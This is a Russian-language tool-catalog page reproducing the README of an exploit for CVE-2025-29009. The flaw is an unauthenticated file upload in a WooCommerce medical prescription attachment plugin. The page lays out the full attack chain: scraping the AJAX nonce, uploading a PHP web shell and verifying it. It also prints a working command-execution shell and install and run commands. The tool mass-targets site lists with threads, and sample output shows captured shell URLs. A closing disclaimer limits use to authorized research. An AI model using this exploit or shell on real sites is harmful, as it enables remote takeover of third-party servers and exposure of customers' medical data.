Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29009 — WordPress Medical Prescription Attachment Plugin for WooCommerce Plugin <= 1.2.3 уязвим для произвольной загрузки файлов высокого приоритета. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-29009
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-29009

CVE-2025-29009

WordPress Medical Prescription Attachment Plugin for WooCommerce Plugin <= 1.2.3 уязвим для произвольной загрузки файлов высокого приоритета.

Репозиторий
1114 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-29009

Плагин Medical Prescription Attachment для WooCommerce версии <= 1.2.3 уязвим к произвольной загрузке файлов высокого приоритета

CVE-2025-29009

Webkul Medical Prescription Attachment — Неограниченная загрузка файлов → Веб-шелл

root@kitploit:~
,-. .   , ,--.     ,-.   ,-.  ,-.  ;--'     ,-.   ,-.   ,-.   ,-.   ,-.
/    |  /  |           ) /  /\    ) |           ) (   ) /  /\ /  /\ (   )
|    | /   |-   ---   /  | / |   /  `-.  ---   /   `-'| | / | | / |  `-'|
\    |/    |         /   \/  /  /      )      /       / \/  / \/  /     /
 `-' '     `--'     '--'  `-'  '--' `-'      '--'  `-'   `-'   `-'   `-'

CVE Plugin Auth

Python
Author

❶ Уязвимость

ПолеДетали
CVECVE-2025-29009
ПлагинWebkul Medical Prescription Attachment Plugin for WooCommerce
ЗатронутоВсе версии ≤ 1.2.3
АвторизацияНе требуется
ТипНеограниченная загрузка файла с опасным типом → Загрузка веб-шелла
CWECWE-434 · Неограниченная загрузка файла с опасным типом

Корневая причина:
Обработчик AJAX wkwcpa_handle_prescription_session (action=wkwcpa_handle_prescription_session) принимает загружаемые файлы через wkwc_pa_prescription_attachment[] без проверки расширения файла или MIME-типа на стороне сервера. Неаутентифицированный злоумышленник может извлечь ajaxNonce из публичного магазина WooCommerce (встроен в JavaScript-объект wkwcpaFrontObj), а затем загрузить PHP веб-шелл напрямую в директорию загрузок сервера. В ответе возвращается полный доступный URL загруженного файла.


❷ Схема атаки

root@kitploit:~
┌──────────────────────────────────────────────────────────────┐
│  1. Resolve front page                                       │
│     GET /  →  GET /shop/  →  GET /product/  →  GET /?wkwcpa=1│
│                                                              │
│  2. Extract nonce                                            │
│     Parse wkwcpaFrontObj.ajax.ajaxUrl                        │
│     Parse wkwcpaFrontObj.ajax.ajaxNonce                      │
│                                                              │
│  3. Upload shell                                             │
│     POST <ajaxUrl>                                           │
│       action = wkwcpa_handle_prescription_session            │
│       nonce  = <ajaxNonce>                                   │
│       type   = upload                                        │
│       wkwc_pa_prescription_attachment[] = shell.php          │
│                                                              │
│  4. Parse response                                           │
│     JSON → data.attachments_img_html[].src  →  shell URL    │
│                                                              │
│  5. Verify shell                                             │
│     GET <shell_url>  →  check for unique signature           │
│                                                              │
│  6. Save to shells.txt                                       │
└──────────────────────────────────────────────────────────────┘

❸ Настройка

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-29009.git
cd CVE-2025-29009
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

❹ Подготовка шелла

Создайте свой PHP-шелл и вставьте уникальную сигнатурную строку, чтобы инструмент мог проверить успешность выполнения:

root@kitploit:~
<?php
// NxploitedShellOK
system($_GET['cmd']);
?>

Сохраните как shell.php в той же директории, что и скрипт.
Строка NxploitedShellOK является сигнатурой — она должна присутствовать в ответе шелла для успешной верификации.


❺ Использование

root@kitploit:~
python3 CVE-2025-29009.py

Запросы

root@kitploit:~
Targets file (default list.txt):              list.txt
Threads (default 10):                         10
Local shell filename (e.g. shell.php):        shell.php
Unique shell signature (e.g. NxploitedShellOK): NxploitedShellOK

Формат целей — list.txt

root@kitploit:~
https://target1.com
target2.com
http://target3.com

Цели без http:// или https:// автоматически получают префикс http://.


❻ Вывод

ФайлСодержимое
shells.txtОдин проверенный URL шелла на строку

Терминал:

root@kitploit:~
[SHELL]  https://target.com/wp-content/uploads/2025/06/shell.php
[FAIL]   https://target2.com  (nonce_not_found)
[FAIL]   https://target3.com  (success_false)
[Status] 3/3  OK:1  FAIL:2

❼ Коды ошибок

КодЗначение
shell_file_missingshell.php не найден в рабочей директории
no_front_pageНи одна страница-кандидат не вернула HTTP 200
nonce_not_foundwkwcpaFrontObj отсутствует на всех страницах
upload_errorСетевая ошибка во время POST-запроса
json_parse_errorОтвет не является валидным JSON
success_falseСервер вернул data.success = false
no_attachmentsЗагрузка выполнена, но URL в ответе отсутствует
shell_url_not_foundНе удалось извлечь URL файла из HTML ответа

❽ Автор

root@kitploit:~
Nxploited
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


❾ Отказ от ответственности

root@kitploit:~
ТОЛЬКО ДЛЯ АВТОРИЗОВАННЫХ ИССЛЕДОВАНИЙ БЕЗОПАСНОСТИ И ОБУЧЕНИЯ.

Автор не несёт ответственности за использование против систем,
которыми оператор не владеет или на тестирование которых
не имеет явного письменного разрешения.

Несанкционированное использование нарушает CFAA, CMA
и аналогичные законы по всему миру.
Только вы несёте ответственность за свои действия.

© 2025 Nxploited · Medical Prescription Attachment ≤ 1.2.3 · Исправлено в 1.2.4

Скачать инструмент